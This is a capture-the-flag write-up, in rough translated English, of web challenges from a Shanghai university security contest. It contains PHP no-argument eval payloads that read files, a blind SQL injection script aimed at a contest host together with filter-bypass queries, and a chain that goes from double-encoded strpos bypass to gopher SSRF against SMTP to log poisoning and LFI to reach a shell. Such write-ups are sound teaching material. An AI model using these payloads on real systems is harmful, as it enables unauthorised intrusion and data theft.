table of Contents
Writeup: Fifth Shanghai university student network security contest -Web
Write Up | Fifth college students in Shanghai cybersecurity official contest WP coming
A, Decade
Source (something like this ...)
<?php
$code = $_GET['code'];
if (';' === preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)) {
if (preg_match('/readfile|if|time|local|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i', $code)) {
echo 'bye~';
} else {
eval($code);
}
} else {
echo "No way!!!";
}
Analyze regularization, function can be called pure letters, but can not have parameters
younger brother of the payload is the echo(next(file(end(scandir(chr(ord(hebrevc(crypt(phpversion(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))))));
official wp of the payload isecho(join(file(end(scandir(next(each(scandir(chr(floor(tan(tan(atan(atan(ord(cos(chdir(next(scandir(chr(floor(tan(tan(atan(atan(ord(cos(fclose(tmpfile()))))))))))))))))))))))))))));
School brother found this blog ByteCTF 2019 part of the WP
to look at the part where the shellcode.
Non-parametric function RCE (./ ..)
var_dump(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))));
phpversion()
Return php version, such as7.3.5
floor(phpversion())
return7
sqrt(floor(phpversion()))
return2.6457513110646
tan(floor(sqrt(floor(phpversion()))))
return-2.1850398632615
cosh(tan(floor(sqrt(floor(phpversion())))))
return4.5017381103491
sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))
return45.081318677156
ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))
return46
chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))
return.
var_dump(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))
Scan the current directory
next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))))
return..
echo(readfile(end(scandir(chr(pos(localtime(time(chdir(next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))))))))));
chdir(next(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))
returnTrue
localtime(time(True))
Returns an arraypos(localtime(time(1)))
Returns an array of the current pointer position data, i.e. tm_sec, 46 may be
readfile(end(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))));
-
hebrevc (crypt (arg)) may be randomly generates a random hash value of the first character is a $ (high probability) or. (small probability) then take the first character only by ord chr
-
readfile(end(scandir(chr(ord(strrev(crypt(serialize(array()))))))));
- Ditto
Other ideas are filtered more, but also need to look at
PHP Parametric Function
Two, Easysql
Reference was made when a SQL injection interesting posture summary
Sql injection notes
This question filtration find many
- IF
Case bypassing the when - or
or bypass is not difficult, the key is to not use the information tableGets the table name: Innodb MySQL database engine injection
In the above versions of Mysql 5.6, there are two related tables in the system innodb Mysql database: innodb_table_stats and innodb_index_stats. It is possible to replace the role of information by searching the two tables
Gets the column name \ no column name injected
select `2` from (select 1,2 union select * from fl111aa44a99g)x limit 1 offset 1
,
In fact, there,
has also been filtered, so the above payload to be changed
select `3` from (select * from (select 1)a JOIN (select 2)b join (select 3)c /*!union*/ select * from fl111aa44a99g)x limit 1 offset 1
union select
no filter union alone, I use inline comments/*!union*/
, in fact, replaced by a blank space%0a
on the line
I enclose my script:
import requests
import string
s = requests.session()
url = "http://47.105.183.208:29898/article.php"
payload = ''
opt = string.ascii_letters + string.digits + string.punctuation
result = ''
for x in range(1, 50):
for i in opt.replace("%", ''):
# sql = "select group_concat(table_name) from mysql.innodb_table_stats where database_name=database() limit 1 offset 1"
sql = "select `3` from (select * from (select 1)a JOIN (select 2)b join (select 3)c /*!union*/ select * from fl111aa44a99g)x limit 1 offset 1"
# sql = "select `2` from (select 1,2 union select * from article_fl111aa44a99g)x limit 1 offset 1"
payload = "1'=(case when (%s) like '%s%%' then 1 else 0 end)='1" % (sql, result + i)
params = {
'id': payload,
}
# print(payload)
response = s.get(url, params=params)
if '2333333333333' in response.text:
result += i
break
if '%' in result:
break
print(result)
# database: cccttffff
# table: article, fl111aa44a99g
There are master said union injected directly on it, as if some truth. .
Three, Babyt5
The original title crying. .
June Arnhem Cup web2 - a problem SSRF
Two-pass encoding bypass strpos
https://bugs.php.net/bug.php?id=76671&edit=1
Description:
The bug is more related to when we send a string with encode to the strpos(), when we sent a string with double encode we were able to bypass the verification, using %2570hp if the case is like strpos($string, "php").
Test script:
$x = $_GET['x']; //?x=file:///var/www/html/readme.%2570hp
$pos = strpos($x,"php");
if($pos){
exit("denied");
}
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$x");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
$result = curl_exec($ch);
echo $result;
Expected result:
----------------
denied
Actual result:
--------------
<?php
//readme
?>
ssrf: use gopher protocol smtp service attack, with LFI getshell
https://github.com/tarunkant/Gopherus
first reading /etc/hosts
acquisition within the network IP, and then try to access neighboring IP, you can find a host open port 25 --SMTP service. We can use the gopher protocol to send messages to the target machine, the back door written log
linux mail log path is generally
/var/log/maillog
/var/log/mail.log
/var/adm/maillog
/var/adm/syslog/mail.log
With LFI contains log files can getshell the
Four, lol2
Not reproduce, the paper does not